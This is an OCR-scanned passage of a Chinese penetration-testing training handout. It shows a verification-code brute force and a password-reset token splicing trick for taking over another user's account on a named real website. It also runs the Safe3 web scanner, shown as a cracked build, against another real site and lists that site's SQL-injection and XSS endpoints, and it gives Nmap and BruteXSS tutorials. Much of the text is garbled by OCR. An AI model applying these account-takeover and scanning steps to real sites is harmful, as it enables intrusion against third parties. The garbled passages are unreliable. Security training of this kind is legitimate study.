Ex LS LLL. a c 


然后 将 字典 设置 为 四 位 数字 0000 ~ 9999， 进 行 爆破 : 









LJ s 
" 可 il = = "nc i 
3803 200 e 0 387 
9804 200 - (] 5387 
3805 200 g G 387 
3806 200 g 器 387 
9807 200 g O 387 
3808 200 C] O 387 
gana 200 口 O 387 
9810 200 Q LE 3 AS] 
9811 200 [3 [1 8387 
Get it ! 


任意 邮箱 激活 
目标 是 www.vobao.com ° 


首先 注册 ， 然 后 直接 退出 找 回 ， 我 们 看 到 它 是 邮箱 验证 。 
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漏洞 篇 逻辑 漏洞 


C C O Ú Q'up www vobsscomheb/gempsss Lases^emal- 9 CC 206549509: E3CÍ 
| PES Ge nm > 14 
Ra DAIS R st SE shee Yon - RBS | AFEA | wee | Witi 
: j | iat atapi 
CFR umen -ae nm 





TH [n] 97H 


1，、 填 写 邮 箱 


$a gie Pau. com RUDI» ceperunt 





BESSA, UE sake MOIR. 





y ue BT Sm 


然后 查看 验证 邮件 : 









REAP EIF: 
你 好 | 
您 在 2015 年 12 月 28 日 12:54:30 RS 邮箱 拭 回 密 的 请 求 ， 请 点 击 下 面 的 链接 修改 旬 的 。 
UL MCA | password aspx? 
zsetpwda&y: SCOUPDDID,OCSBOBSBASPBOUBACBELDBE SDD 33060 1FC SBDOA6Obvudz7ca498f74-c7dd- 
fasfa4f3a - - 


COORG SR GI. mee Spi ai EREHE) 
AT MERKSEM S. RiEBARMAZIIN, EB RE iK IG AERE! " 


我 们 发 现 其 中 有 一 个 vstr ? CRR E ZA OM PAR URL 是 一 样 的 ， 也 就 是 
— 4% o 


- 


r O htto:/Avww.vobao.com/nhelp/cetpass 1 .asr 








a f^. len ei rh). BR rh ot. L] 


那么 vud 就 应 该 起 到 类 似 验 证 码 的 作用 。 如 果 我 们 不 填写 vud 直接 访问 ， 显 示 无 
效 。 那 么 就 能 确定 它 生 验证 码 了 。 


155 


漏洞 篇 逻辑 漏洞 


http://www. vobao, com/help/password. aspx?act=Setpmd&vstr=9cE2C02D0D1D8C9808848BO8 


ACBE 1DBE3DD330601F COBDAG0& vud- 


I " 











(ps: MERE 是 显示 - verre ) 


这 个 vud 看 起 来 像 是 个 md5， 但 是 实际 上 是 随机 码 。 那 么 我 们 党 试 拿 另 一 个 邮箱 
注册 找 回 : 





( 癌 果 您 元 法 点 击 此 链接 ， 请 将 它 复 制 到 浏览 器 地 址 栏 后 访问 

可 以 看 到 vstr 是 不 一 样 的 ， vud 当然 也 不 一 样 。 但 是 如 果 我 们 邮箱 2 的 vud 拼 
接 到 邮箱 1 的 vstr 上 呢 ? 由 于 邮箱 1 的 vstr 是 已 知 的 ， 即 使 我 们 访问 不 了 邮箱 
1， 也 可 以 通过 找 回 密码 页 面 的 URL. 来 获得 ， 那 么 我 们 就 可 以 构造 出 : 





http://www. vobao, com/help/password. aspx? act=setpwd&vet r=9CE2C02DD1D8C98 
ACBE1DBESDD330601FCBBDADOS vud-dc6036e 7-ad9 T -40b8-bOSBb-1 fe224b4 fa5 


提交 后 就 成 功 了 。 
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ZI" 





€ C | «vw. vobao. com/help/password. agpx'"act-setpwd&vstr-9SCE2COZDD1DSC 980884S8BOBACBE1DBESDD3 30€ 
RASHES) DE ENER - = firs ICE fi 





3 es = 


i Ac b 


假设 邮箱 1 是 别人 的 邮箱 ， 我 们 不 能 访问 其 内 容 ， 但 我 们 能 够 控制 邮箱 2， 那 我 们 就 
能 拿 邮 箱 2 来 重 置 邮 箱 1 的 账户 。 可 以 看 到 ， 这 个 漏洞 的 主要 成 因 就 是 未 对 不 同 用 户 
的 验证 码 进 行 区 分 。 其 中 vstr 起 到 用 户 标 志 的 作用 ， vud 起 到 邮箱 验证 码 的 作 
用 o 


工具 篇 Safe3 WVS 


米 斯 特 白 帽 培训 讲义 工具 篇 Safe3 WVS 


讲师 : ghOstkey 
教理 : 飞龙 
ti : CC BY-NC-SA 4.0 
介绍 
Safe3 WVS 是 一 款 使 用 较为 领先 的 智能 化 卜 虫 技术 及 SQL 注入 状态 检测 技术 的 工 


具 ， 相 比 国内 外 同类 产品 智能 化 程度 更 癌 ， 速 度 更 快 ， 结 有 果 更 准确 。 


所 以 我 们 一 般 用 它 检 测 SQL 注入 漏洞 。 不 过 目前 也 可 以 利用 这 款 工 具 进 行 反 射 
XSS 的 控 握 ， 因 为 他 可 以 通过 自动 化 的 载荷 来 测试 并 判断 网 页 源码 ， 从 而 判断 是 否 
存在 反射 型 XSS 漏洞 。 


@& Safed ted RAM RETR v 10 1 Crack By Lkoul LCG] Wttp://wew. 52pojie. en 





2 ? 
© frr cr 
一 漏洞 选项 -一 HTTP 验 证 授权 


eee | 
deii Atlan tibet a: PESTS Huone A Username: | | ] 






































| 四 登录 | 后 各 |i: : à 
* wisi: | | 四 bi gest Piet | | 
P vim emt | 门 mu Domain: | E 
ETRS 
ls ez: o 漏洞 : 0 
QmniICHREUESUPR) 


Sas a Oa ad fd wk fd d dd a sb Bg i i cii be a adii iin ba pe Lip A Gud LGlldmccccmcrm bf 0 bos uj i iii i ddp t Ed fc 


下 载 
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工具 篇 Safe3 WVS 


首先 需要 下 载 并 安装 .net 2.0 框架 ，XP 之 前 可 以 需要 单独 安装 ，Win7 之 后 都 自 带 
Y o 


AEJEREXZRTIiZSafe3- 
Th 


Ls 

| 区 EQL 注 入 | Missi 
ne T Lem FERRI 
打开 程序 Tee Px cm 





打开 程序 主 界面 后 ， 我 们 在 上 方 的 输入 框 中 输入 URL 。 在 漏洞 设置 分 组 框 中 选 
4£"sqli£ A"fe"xss" » AR Jer ho ZR. s RR i cookie 的 话 ， 在 扫描 设置 分 组 框 中 输入 
cookie * cookie 可 以 通过 浏览 蜂 来 获取 ， 不 同 浏览 宽 的 获取 方法 不 同 。 


FETTE Teb Hant kv 0. 1 Crack By Lkou[LCG] Http://www. 52pojie. cn 


- 





Q http: {fewn hbjjzd. cn | |GET ML 
_ 扫 描 设置 -漏洞 选项 - | FTTF 验 证 授权 一 一 


[v]Javaser Land [v]uri3& EÉ [v] POST Retr V|SQLiE ^. MissM [¥) None ere | | 
" i | dd, Userfane: 
EBC oc EEfemi OSes | (raie 





es One Orem pue Pert E] 
0 1 排除 : C Murun —~! Domain: | | 

















-METRS - 
lg qe. o 漏洞 : 0 
- 正在 解析 Wh1: http://www. hbjjzd. en/ 









































WALT CARSAMS HE) 
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有 具 篇 Safe3 WVS 


卉 写 完毕 之 后 点 击 “ 开 始 "按钮 ， 扫 描 结 束 之 后 我 们 会 在 下 方 的 列表 框 中 看 到 漏洞 信 


-— -H Sed = 7 E = RIA 


a Safe3 Te DI 10. 1 Crack By Lkoul[ LEG] Http://www. S2pojie. cn 









HERE - 
r PESH [v]POSTREFUT 


nane-adnintest; Hm lvt b81d2d35.| 







sane A [v]xssdess 
F)rfemis OSes 






Fem [Av 


@ mas: |  — O 
W He: 


jetz 
lg mem. s 漏洞 : 12 








s 正在 解析 Wl1: http://www. hbjjzd cr rdrxx/ X3EXEFXBFXEDSEFXEFXEDXIZXBEXIZXB3X3C/FONT%3Eůnbsp; SODSOAXZONZOSZOSZOX2O0NCOR2ONZ 





A 呵 右键 复制 或 导出 数据 ) 


.hbjjJzd. cn/main. php?mod id-17 IE sqlit omi 

.hbjjzd. cn/main. php?mod, 1d-1 icxssibuhi 

. hbjjzd. cn/search. php mod 1d-8880526348keywor eT eee ee XBDXDOXBCXEFSBFXBI [| 
.hbjjzd em detail. php?code=1115&table name=tb common code=1115 存在 sql 注 ， 

. hbjjzd. en/pic_detail. php?code-TO&table name=tb pic code-T5 Fie sqlitA imi . 

.hbjjrd. em detail. php?code-1115&table name-tb common table name-tb common TFE salit ^jimi 

. hb] j zd. cn/search. php keywor d=XEFSBFXBD SEF REF REDMEF MBF RBDSEF MBF SBDNEF MBF ABDMEF MBF XBDSDS SBC MEF SBF NBD REF MBF MBDMEF MBF S 
. hbjjzd. cn search. php keywor d=XEFSBFREDSEF SEF RBDXEF SBF RED REF MBF ABIMEF SBF ABDREF MEF MBDRDS REC MEF MBF NED REF MBF MBDMEF MBF R 
; hb]j zd. enpi c. delar, pap rendi (Ges able name=tb_pi c table name-tb pic 存在 sql 注 人 漏洞 

hbi : : 





我 们 可 以 在 列表 框 中 点 击 右键 ， 然 后 选择 导出 报表 。 
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有 具 篇 Safe3 WVS 


FOEIVTRRDT nig 33x14 4208 1 Crack By Lkoul LCG] Htitp://rrr.S2pojie. cn 





? 

Q http://www. hbjjzd en 

438858838 — — — — — A 
[v]IavascriptftUrT —[v]Ur13R SEIS] (VIPOST ftir [V|SQLTE A, [V]xssieuh 


|[namecadmintest; Hm lvt b81d2d35: pemi 。” 固 登 录 | 后 台 


|  Adipxsves os 
— Ur. a 
P vids: logout | 











pecie 
lig me. s0 漏洞 : 12 


< EGAU: http://www. hbj jzd. en/zdzxx/images/index, copyRi ght. htm 





ut 漏洞 显示 (可 右键 复制 或 导出 数据 ) 


http://www. hbjjzd cn/main.php?mod id-17 存在 sql A iil 
http://www. hb] jzd. cn/main. php?mod_id=17 存在 X55 漏洞 | 
http://www. hbjjzd. en/search. php mod .id-889526348keyw or J- XEF SBF SBD REF SBP ABDSEF SEF SBD REF AEF RBDMEF NBF ABDREF AEF RBDSDOSBC SEF NEF SB 
http://www. hbj jzd. cn/ detail. php?code=1115@table name=tb common code=1115 TFE sqli Adil 

http: //www. hbjjzd. cn/pic_detail. php?code=Th&table name=tb_pic code=T6 fFitsqlit iil 

http://www. hbjjzd cr detail. php?code=1115&table name-tb, common table name-tb common 行 在 sql 注 大 漏洞 

http://www. hbjjzd. cn/search. php keyword-WEFRBBFSBDXEFXBFXBIXEFSBFEEDSEFSBEFEBISEFXBFSBDXEFXBFSBDEDSSBCKEFEBFARBDXEFEBFSBDXEFSBEF! 
http: //www. hb] jzd. cm search. php keyword-XEFSBFXBDXEFWBFSBIXEFXBFXBDSEFANBFRBISEFXBFRBISEFSBFXBDSIGSBCSEFEBFRBDSEFSBFRSBDSEFXBFA 
http://www. hbj jzd. cn/pic detail.php?code-TO&table name=th nir tahle name-tb pic 存在 sql 注 人 漏洞 

http WWW. hb jzd. cn/main. php?pages= TO sqt imi 


ht t A (WWW hb13zd CIL "main hn? table T. Am &à— T tb c omm o Tum 
http / www. hbiizd. cr main.php?table name=tb. pq 
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368097 $Dilvgsa 7.1 
L1] 
) CQ @ Y*r p file:// | vi 


口 跨 屏 浏览 Safe3 网 站 漏洞 扫描 报告 < | + 


Web ta tl HHHK 

漏洞 危险 等 级 图 表 

MAS RK 12 
0O ARSE 12 my 
O Pee og 
Q Kf og 
Q 潜在 危险 ogg (D 

漏洞 详情 

四 sql 注 入 漏洞 

A. 

用 F3 

级 

详细 内 容 


http://www.hbjjzd.cn/main.php?mod id-17 TFE sq EA Wia] 


详细 内 容 


1- “eH... - ie 


在 Safe3 的 目录 下 ， 我 们 会 看 到 一 个 spider.log ， 这 个 文件 以 纯 文本 的 形式 保 
存 了 漏洞 信息 。 我 们 打开 它 : 


THe) MAO BLO SSO EOD 


http://www.hbjjzd.cn/detail .php?code=1115&table_name=tb_common code=1115 EREA 
http://www.hbjjzd.cn/detail .php?code=1115&table_name=tb_common table_name=tb_common = sq A jaa 
http://www.hbjjzd.cn/main.php?mod_id=17 F Esq EA a 
http://www.hbjjzd.cn/pic detail.php?code-76&table name-tb pic code-76 ETE MR 
http://www .hbjjzd.cn/pic detail.php?code-76&table name-tb pic table name-tb pic Gfesqlit Aji 
http://www.hbjjzd.cn/search.php mod_id=88952634@keyword=ZEFZBF2ZBDZEFZBFZBDZEFZBFZBDZEF ZBFZBDZEFZBFABDZEFS 
BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD 存在 P0ST sq £A a 
http://www.hbjjzd.cn/search.php keyword=ZEFZBF2BDZEF2BF ZBDZEF BF ZBDZEF ZBF ZBDZEF ZBFZBDZEF ZBFZBDZDBZBCZEFS 
BFZBDZEFZBFZBDZEFZBFZBD&mod id-8895263^ 存在 P0ST sA a] 
2016-7-14 15:45:22 
2616-7-14 15:47:24 
JFS8I&fr http ://1ocalhost/ 
EL ur ocsibusté/subfsct/Gwx ains FESSA 
2016-7-14 15:57:25 
2016-7-14 15:48:52 
FAE Thttp://localhost/ 
http://localhost/subject/fxss.php?xss- [frfrxsSjfmijs 
2816-7-1h 15:48:52 
2616-7-14 15:48:53 
JF$8lBfrhttp://1ocalhost/ 
http://localhost/subject/fxss.php?xss- frfrxsSjfjs 
2816-7-1h 15:48:55 
2616-7-14 15:49:61 
Fle http://localhost/ 
http://localhost/subject/fxss.php?xss- 存在 XSS 漏 洞 
http://localhost/a/my.php?xss- frfrXxsSjmj 
2616-7-14 15:49:64 
2016-7-14 15:59:55 
JFS8fBfr http://www .hbjjzd.cn/ 
http://www.hbjjzd.cn/main.php?mod_id=17 存在 sq1 和 注入 漏洞 
http://www.hbjjzd.cn/main.php?mod_id=17 F XSS ya] 
http://www.hbjjzd.cn/search.php mod_id=88952634&keyword=%EF%BF%BD%EF%BF%BD%EF%BFZBDŽEF%BF%BD%EF%BF%BD%EF% 
BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD Æ EPOST sqlit Apya 
http://www.hbjjzd.cn/detail.php?code=1115&table_name=tb_common code-1115 存在 sq1 和 注入 漏洞 
http://www.hbjjzd.cn/pic_detail.php?code=76&table_name=tb_pic code-76 存在 5q1 往 入 漏洞 
http://wn.hbjjzd.cn/detail.php?code-1115&table name-tb common table_name=tb_common 存在 5q1 注 入 漏洞 
http://www .hbjjzd.cn/search.php keyword=%EFZBF2BDZEF ZBF2BDZEF ZBFZBDZEF ZBF ZBDZEF ZBF ZBDZEF ZBFABDZDBZBCZEFS 
BF%BD%EF%BF%BD%EF%BF%BD&mod_id=88952634 存在 P0ST sqljt JR 
http://www.hbjjzd.cn/search.php keyword=%EFZBF2ZBDZEFZBF2BDZEF ZBFZBDZEF ZBF ZBDZEF ZBF ZBDZEF ZBFZBDZDBABCZEFS 
BFZBDZEFZBF%BDZEFZBFZBD&mod id=88952634 Æ EPOST XSSjfjf8 
http://www.hbjjzd.cn/pic_detail.php?code=76&table_name=tb_pic table_name=tb_pic GFfesqlit Aji 
http://www.hbjjzd.cn/main.php?pages= Gfesqlit A aa 
http://www.hbjjzd.cn/main.php?table_name=tb_common&mod_id=1 mod id-1 存在 sq1 广 入 漏洞 
http://www.hbjjzd.cn/main.php?table_name=tb_common&mod_id=1 mod id-1 存在 XS$; 浙 洞 








Et 
我 们 可 以 编写 一 个 python 文件 来 提取 其 中 的 SQL 注入 URL : 


# coding: utf-8 


fi 
fo 


open('spider.log', 'r') 
open('spider sql.log', 'w') 


for line in fi.readlines(): 
line = line.strip('\n' ) 
if 'sql;£A' in line: 
url = line.split(' ')[0] 
print url 
fo.write(url) 
fo.write( '^n') 


fi.close() 
fo.close() 


MY 3K 


工具 篇 Safe3 WVS 


Web 安全 扫描 器 天 梯 : 
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米 斯 特 白 帽 培训 讲义 工具 篇 Nmap 


讲师 : ghOstkey 
整理 : 飞龙 
协 仅 : CC BY-NC-SA 4.0 


4r 28 


Nmap (网 络 映射 器 ) 是 由 Gordon Lyon 涉及 ， 用 来 探测 计算 机 网 络 上 的 主机 和 服 
务 的 一 种 安全 扫描 器 。 为 T5 会 制 网 络 拓 补 图 , Nmap 发 送 特制 的 数据 包 到 目标 主 
机 ， 然 后 对 返回 数据 包 进 行 分 析 。Nmap 是 一 款 枚 举 和 测试 网 络 的 强大 工具 。 


Nmap 有 两 种 界面 : 可 视 化 界面 和 命令 行 界面 。 


下 载 


https://nmap.org/download.html 


使 用 


典型 用 途 : 


通过 对 设备 或 者 防火 墙 的 探测 来 审计 其 安全 性 
探测 目标 主机 的 开放 端口 。 

网 络 存 储 、 网 络 映射 、 维 护 和 资产 管理 。 (这 个 有 待 深入 ) 
通过 识别 新 的 服务 器 审计 网 络 的 安全 性 。 

探测 网 络 上 的 主机 。 


简单 扫描 
Nmap 默认 使 用 ICMP ping 和 TCP 全 连接 ( -PB ) 进行 主机 发 现 ， 以 及 使 用 
TCP 全 连接 ( -sT ) 执行 主机 扫描 。 默 认 扫描 端口 是 1~ 1024， 以 及 其 列表 中 


的 常用 端口 。 


语法 : 


nmap < 目标 IP> 


例子 : 


C:\Users\asus> nmap 192.168.1.1 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-22 10:37 ?Di1u 
téx?6r?7? 

Nmap scan report for localhost (192.168.1.1) 

Host is up (0.0062s latency). 

Not shown: 993 closed ports 

PORT STATE SERVICE 

21/tcp filtered ftp 

22/tcp filtered ssh 

23/tcp filtered telnet 


53/tcp open domain 
80/tcp open http 

49152/tcp open unknown 
49153/tcp open unknown 


MAC Address: 68:89:C1:74:84:43 (Huawei Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds 


多 个 IP 可 以 以 运 号 分 隔 : 192.168.1.1,2,3,4,5 : 4, Y] VAS JE LA PRG Ù 
围 : 192.168.1.1-255 ， 也 可 以 使 用 CIDR 记 法 : 192.168.1.0/24 ° 


nmap -vv < 目标 IP» 


C:NUsersNasus» nmap -vv 192.168.1.1 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-22 10:47 ?Di1u 
téx?6r7?? 

Initiating ARP Ping Scan at 10:47 

Scanning 192.168.1.1 [1 port] 

Completed ARP Ping Scan at 10:47, 0.15s elapsed (1 total hosts) 
Initiating Parallel DNS resolution of 1 host. at 10:47 

Completed Parallel DNS resolution of 1 host. at 10:47, 0.01s ela 
psed 

Initiating SYN Stealth Scan at 10:47 

Scanning localhost (192.168.1.1) [1000 ports] 

Discovered open port 80/tcp on 192.168.1.1 

Discovered open port 53/tcp on 192.168.1.1 

Discovered open port 49153/tcp on 192.168.1.1 

Discovered open port 49152/tcp on 192.168.1.1 

Completed SYN Stealth Scan at 10:47, 2.27s elapsed (1000 total p 
orts) 

Nnap scan report for localhost (192.168.1.1) 

Host is up, received arp-response (0.0052s latency). 

Scanned at 2016-12-22 10:47:09 ?3D1U+ex?e+t?3?3 for 3s 

Not shown: 993 closed ports 

Reason: 993 resets 


PORT STATE SERVICE REASON 

21/tcp filtered ftp no-response 
22/tcp filtered ssh no-response 
23/tcp filtered telnet no-response 
53/tcp open domain syn-ack ttl 64 
80/tcp open http syn-ack ttl 64 
49152/tcp open unknown syn-ack ttl 64 
49153/tcp open unknown syn-ack ttl 64 


MAC Address: 68:89:C1:74:84:43 (Huawei Technologies) 


Read data files from: C:\Program Files (x86)\Nmap 
Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds 

Raw packets sent: 1004 (44.160KB) | Rcvd: 998 (39.924 
KB) 


nmap < 目标 IP» -p < 端口 > 


C:NUsersNasus» nmap 192.168.1.1 -p 1-500 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-22 10:59 ?D1U 
téx?6r?7? 

mass dns: warning: Unable to determine any DNS servers. Reverse 
DNS is disabled. Try using --system-dns or specify valid servers 
with --dns-servers 

Nmap scan report for 192.168.1.1 

Host is up (0.0061s latency). 

Not shown: 495 closed ports 

PORT STATE SERVICE 

21/tcp filtered ftp 

22/tcp filtered ssh 

23/tcp filtered telnet 

53/tcp open domain 

80/tcp open http 

MAC Address: 68:89:C1:74:84:43 (Huawei Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 2.08 seconds 


端口 可 以 是 单个 ， 也 可 以 是 多 个 ， 多 个 端口 可 以 以 过 号 分 隔 ， 比 
如 21,22,23,53,80 ， 也 可 以 使 用 短 横 线 指定 范围 ， 比 如 1-1024 。 


Ping 42 4% 
nmap -SP < 目标 IP» 


Ping 扫描 其 实 就 是 只 执行 主机 发 现 ， 不 扫描 具体 端口 。 大 家 可 以 看 到 结果 中 没有 ; 
口 的 信息 ， 只 告诉 你 主机 通 不 通 ， 所 以 也 很 快 。 


C:NUsersNasus» nmap 192.168.1.1 -sP 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-22 10:52 ?D1u 
téx?6r7?? 

mass dns: warning: Unable to determine any DNS servers. Reverse 
DNS is disabled. Try using --system-dns or specify valid servers 
with --dns-servers 

Nmap scan report for 192.168.1.1 

Host is up (0.0030s latency). 

MAC Address: 68:89:C1:74:84:43 (Huawei Technologies) 

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds 


与 之 相反 ， 有 一 个 选项 征 只 执行 端口 扫描 ， 不 执行 主机 发 现 的 ， 
) 


C:NUsersNasus» nmap 192.168.1.1 -PN 


Starting Nmap 7.01 
téx?6r?7? 
mass dns: warning: 


( https://nmap.org ) at 2016-12-22 10:54 ?D1üU 


Unable to determine any DNS servers. Reverse 


DNS is disabled. Try using --system-dns or specify valid servers 


with --dns-servers 


Nmap scan report for 192.168.1.1 
Host is up (0.0062s latency). 
Not shown: 993 closed ports 


PORT STATE 
21/tcp filtered 
22/tcp filtered 
23/tcp filtered 
53/tcp open 
80/tcp open 
49152/tcp open 
49153/tcp open 

MAC Address: 68:89: 


SERVICE 

ftp 

ssh 

telnet 

domain 

http 

unknown 

unknown 

C1:74:84:43 (Huawei Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 2.47 seconds 


操作 系统 类 型 检测 


nmap -0 < 目标 IP> 


C:NUsersNasus» nmap www.baidu.com -O 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-22 11:03 ?D1U 
téx?6r?7? 

mass dns: warning: Unable to determine any DNS servers. Reverse 
DNS is disabled. Try using --system-dns or specify valid servers 
with --dns-servers 

Nnap scan report for www.baidu.com (61.135.169.125) 

Host is up (0.0038s latency). 

Other addresses for www.baidu.com (not scanned): 61.135.169.121 
Not shown: 998 filtered ports 

PORT STATE SERVICE 

80/tcp open http 

443/tcp open https 

Warning: OSScan results may be unreliable because we could not f 
ind at least 1 open and 1 closed port 

Device type: switch 

Running (JUST GUESSING): HP embedded (86%) 

OS CPE: cpe:/h:hp:procurve_switch_4000m 

Aggressive OS guesses: HP 4000M ProCurve switch (J4121A) (86%) 
No exact OS matches for host (test conditions non-ideal). 


OS detection performed. Please report any incorrect results at h 
ttps://nmap.org/submit/ 
Nmap done: 1 IP address (1 host up) scanned in 9.35 seconds 


组 合 扫描 
比如 我 们 要 扫描 1 ~ 1024 端口 ， 详 细 输 出 ， 并 且 探 测 操作 系统 。 


C:\Users\asus> nmap 192.168.1.1 -p 1-1024 -vv -0 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-22 11:06 ?Di1u 
téx?6r7?? 

Initiating ARP Ping Scan at 11:06 

Scanning 192.168.1.1 [1 port] 

Completed ARP Ping Scan at 11:06, 0.14s elapsed (1 total hosts) 

mass dns: warning: Unable to determine any DNS servers. Reverse 

DNS is disabled. Try using --system-dns or specify valid servers 
with --dns-servers 

Initiating SYN Stealth Scan at 11:06 

Scanning 192.168.1.1 [1024 ports] 

Discovered open port 53/tcp on 192.168.1.1 

Discovered open port 80/tcp on 192.168.1.1 

Completed SYN Stealth Scan at 11:06, 2.03s elapsed (1024 total p 
orts) 

Initiating OS detection (try #1) against 192.168.1.1 

Retrying OS detection (try #2) against 192.168.1.1 

Retrying OS detection (try #3) against 192.168.1.1 

Retrying OS detection (try Z4) against 192.168.1.1 


Retrying OS detection (try #5) against 192.168.1.1 
Nmap scan report for 192.168.1.1 

Host is up, received arp-response (0.0014s latency). 
Scanned at 2016-12-22 11:06:44 ?3D1U+ex?e+t?3?3 for 15s 
Not shown: 1019 closed ports 

Reason: 1019 resets 

PORT STATE SERVICE REASON 


21/tcp filtered ftp no-response 
22/tcp filtered ssh no-response 
23/tcp filtered telnet  no-response 
53/tcp open domain syn-ack ttl 64 
80/tcp open http syn-ack ttl 64 


MAC Address: 68:89:C1:74:84:43 (Huawei Technologies) 

No exact OS matches for host (If you know what OS is running on 

it, see https://nmap.org/submit/ ). 

TCP/IP fingerprint: 

OS: SCAN(V-7.0196E-496D-12/ 22960T—5396CT—196CU- 3 7502%PV=Y%DS=1%DC=D%G= 
Y%M=6889C1% 

OS: TM=585B4353%P=1686 - pc -windows -windows ) SEQ( SP=106%GCD=1%ISR=10 
A%TI=Z%CI=Z 

OS: %LI=I%TS=U )SEQ( CI=Z%II=I%TS=U ) SEQ ( CI=Z%II=I ) OPS (01=M5B4NNSNW2 
%02=M5B4NNS 

OS: NW2%03=M5B4NW2%04=M5B4NNSNW2%05=M5B4NNSNW2%06=M5BANNS )WIN(W1= 
16D0%W2=16D 

OS: O%W3=16D0%W4=16D0%W5=16D0%W6=16D0 ) ECN (R=Y%DF=Y%T=40%W=16D0%0= 
M5B4NNSNW2% 

OS : CC=Y%Q= ) T1 ( R=Y%DF=Y%T=40%S=0%A=S+%F=AS%RD=0%Q= ) T2(R=N)T3(R=N) 
T4(R=Y%DF=Y 

OS : %T=40%W=0%S=A%A=Z%F =R%O=%RD=0%Q= ) T5 (R=Y%DF=Y%T=40%W=0%S=Z%A=S 
+%F=AR%O=%R 

OS: D=0%Q= ) T6 ( R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q= ) T7 ( RZN )U1( 
R=Y%DF=N%T= 

OS: 40%IPL=164%UN=O%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G ) IE (R=Y%DF I= 
N%T=40%CD=S 

OS: ) 


Network Distance: 1 hop 
TCP Sequence Prediction: Difficulty=262 (Good luck!) 
IP ID Sequence Generation: All zeros 


Read data files from: C:\Program Files (x86)\Nmap 
OS detection performed. Please report any incorrect results at h 
ttps://nmap.org/submit/ 
Nmap done: 1 IP address (1 host up) scanned in 15.21 seconds 

Raw packets sent: 1152 (54.954KB) | Rcvd: 1110 (48.46 
2KB) 


可 以 看 出 来 没 探测 到 什么 东西 ， 因 为 是 路 由 器 ， 大 家 这 种 情况 认为 是 Linux 就 好 
Ta 


脚本 (补充 ) 


Nmap 有 个 叫做 NSE 的 脚本 引擎 ， 也 自 带 了 一 些 脚 本 ， 更 多 脚本 可 以 去 官网 下 
载 O 


脚本 的 类 型 有 : 


auth: 负责 处 理 鉴 权证 书 (HAAR) 的 脚本 

broadcast: 在 局 域 网 内 探查 状况 ， 如 dhcp/dns/sqlserver 等 服务 
brute: 提供 暴力 破解 方式 ， 针 对 常见 的 应 用 如 http/snmp 等 

default: 使 用 -sC 或 -A 选项 扫描 时 候 上 默认 的 脚本 ， 提 供 基本 脚本 扫描 能 力 
discovery: 对 网 络 进行 更 多 的 信息 ， 如 SMB 枚 举 、SNMP 查 询 等 

dos: 用 于 进行 拒绝 服务 攻击 

exploit: 利用 已 知 的 漏洞 入 侵 系 统 

external: 利用 第 三 方 的 数据 库 或 资源 ， 例 如 进行 Whois 解 本 

fuzzer: 模糊 测试 的 脚本 ， 发 送 异 第 的 包 到 目标 机 ， 探 测 ] 出 海 在 漏洞 intrusive: 
入 侵 性 的 脚本 ， 此 类 脚本 可 能 引发 对 方 的 IDSVIPS 的 记录 或 屏蔽 

malware: 探测 目标 机 是 否 感 染 了 病毒 、 开 司 了 后 门 等 信息 

safe: 此 类 与 intrusive 相 反 ， 属 于 安全 性 脚本 

version: 负责 增强 服务 与 版 本 扫描 (Version Detection) 功能 的 脚本 

vuln: 负责 检查 目标 机 是 否 有 常见 的 漏洞 (Vulnerability) ， 如 是 否 有 MS08_067 


向 命令 行 添加 --script=< 类 型 > 来 使 用 脚本 。 
下 面 演示 了 使 用 default 脚本 来 探测 主机 上 的 服务 。 


C:\Users\asus> nmap --script-default 192.168.1.1 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-22 11:10 ?Di1u 
téx?6r?7? 

mass dns: warning: Unable to determine any DNS servers. Reverse 
DNS is disabled. Try using --system-dns or specify valid servers 
with --dns-servers 

Nmap scan report for 192.168.1.1 

Host is up (0.0051s latency). 

Not shown: 993 closed ports 

PORT STATE SERVICE 

21/tcp filtered ftp 

22/tcp filtered ssh 

23/tcp filtered telnet 


53/tcp open domain 

| dns-nsid: 

| bind.version: dnsmasq-2.49 

80/tcp open http 

| http-title: Site doesn't have a title (text/html). 
49152/tcp open unknown 

49153/tcp open unknown 


MAC Address: 68:89:C1:74:84:43 (Huawei Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds 


工具 篇 Nmap 


e Nmap 脚本 使 用 总 结 


e Nmap 参考 指南 

e Kali Linux 网 络 扫描 秘籍 PAH 端口 扫描 (一 ) 
e Kali Linux 网 络 扫描 秘籍 第 三 草 端口 扫描 (二) 
e Kali Linux 网 络 扫描 秘籍 第 三 章 端口 扫描 (=) 
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KH AF 4 PASS SL 工具 篇 BruteXSS 


讲师 : ghOstkey 
整理 : 飞龙 
协议 : CC BY-NC-SA 4.0 


4r 28 


BruteXSS 是 一 个 非常 强大 和 快速 的 跨 站 点 脚本 检测 工具 ， 可 用 于 暴力 注入 参数 。 
BruteXSS 从 指定 的 词 库 加 载 多 种 有 效 载 阅 进 行 注入 ， 并 且 使 用 指定 的 载 税 和 扫描 
检查 这 些 存 在 XSS 漏洞 的 参数 。 得 益 于 非常 强大 的 扫描 功能 ， 在 执行 任务 时 ， 
BruteXSS 非常 准确 而 且 极 少 误 报 。BruteXSS 支持 POST 和 GET 请 求 ， 并 适应 
现代 Web 应 用 程序 。 


特性 : 


e XSS 爆破 

e XSS 4344 

e GET/POST 请 求 
。 可 包含 自 定义 单 记 
e 人 性 化 的 JU 


— 
OR 
首先 安装 Python 2.7 ° 


依赖 是 Colorama 和 Mechanize 两 个 库 。 但 我 看 到 源码 中 包含 了 这 两 个 库 ， 所 以 
一 般 不 用 自己 安装 。 如 果 运 行 失 败 ， 那 么 执行 这 两 条 命令 手动 安装 一 下 。 


pip install colorama 
pip install Mechanize 


之 后 
从 https://github.com/shawarkhanethicalhacker/BruteXSS/zipball/maste! 
